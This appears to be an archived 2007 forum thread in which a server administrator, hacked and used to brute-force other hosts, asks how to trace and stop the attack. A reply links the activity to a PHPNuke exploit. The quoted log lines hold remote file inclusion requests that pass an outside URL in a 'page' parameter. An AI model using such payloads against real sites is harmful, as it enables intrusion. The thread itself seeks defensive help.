Hi,
I recieved an abuse report from 'The Planet' saying that my server was being used to brute force attack other servers. Below is an excerpt of the log file they gave me.
-----------------------------------------------------------
216.127.xx.xx - - [08/Jul/2007:00:18:08 +0200] www.europeanexperts.org GET /*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 403 2559
216.127.xx.xx - - [08/Jul/2007:00:18:03 +0200] www.europeanexperts.org GET /question/*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 200 -
-----------------------------------------------------------
Need some help tracking down what's going on.
I found an evil.txt and evil.txt.1 in my /tmp which are obviously some kind of exploit code and I'm fairly sure they got in there through a particular site that had register_globals turned off. My problem is how do I figure out what script/program etc. is launching the attacks against other servers. Also how can I tell if the scripts in the /tmp were actually executed etc. The server is near it end of life as far as I'm concerned.
My main concern right now is to stop the outward attacks for a few weeks so I can get the stuff of the server and shut it down.
Full Version: server possibly compromised...need help.
QUOTE (jackercrack @ Jul 9 2007, 11:27 PM) 
Hi,
I recieved an abuse report from 'The Planet' saying that my server was being used to brute force attack other servers. Below is an excerpt of the log file they gave me.
-----------------------------------------------------------
216.127.xx.xx - - [08/Jul/2007:00:18:08 +0200] www.europeanexperts.org GET /*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 403 2559
216.127.xx.xx - - [08/Jul/2007:00:18:03 +0200] www.europeanexperts.org GET /question/*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 200 -
-----------------------------------------------------------
Need some help tracking down what's going on.
I found an evil.txt and evil.txt.1 in my /tmp which are obviously some kind of exploit code and I'm fairly sure they got in there through a particular site that had register_globals turned off. My problem is how do I figure out what script/program etc. is launching the attacks against other servers. Also how can I tell if the scripts in the /tmp were actually executed etc. The server is near it end of life as far as I'm concerned.
My main concern right now is to stop the outward attacks for a few weeks so I can get the stuff of the server and shut it down.
I recieved an abuse report from 'The Planet' saying that my server was being used to brute force attack other servers. Below is an excerpt of the log file they gave me.
-----------------------------------------------------------
216.127.xx.xx - - [08/Jul/2007:00:18:08 +0200] www.europeanexperts.org GET /*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 403 2559
216.127.xx.xx - - [08/Jul/2007:00:18:03 +0200] www.europeanexperts.org GET /question/*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 200 -
-----------------------------------------------------------
Need some help tracking down what's going on.
I found an evil.txt and evil.txt.1 in my /tmp which are obviously some kind of exploit code and I'm fairly sure they got in there through a particular site that had register_globals turned off. My problem is how do I figure out what script/program etc. is launching the attacks against other servers. Also how can I tell if the scripts in the /tmp were actually executed etc. The server is near it end of life as far as I'm concerned.
My main concern right now is to stop the outward attacks for a few weeks so I can get the stuff of the server and shut it down.
I dont know the ACTUAL script its running off the top of my head but evilx is part of an attempt to exploit PHPnuke to find security holes. Start with the sites with PHPnuke
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.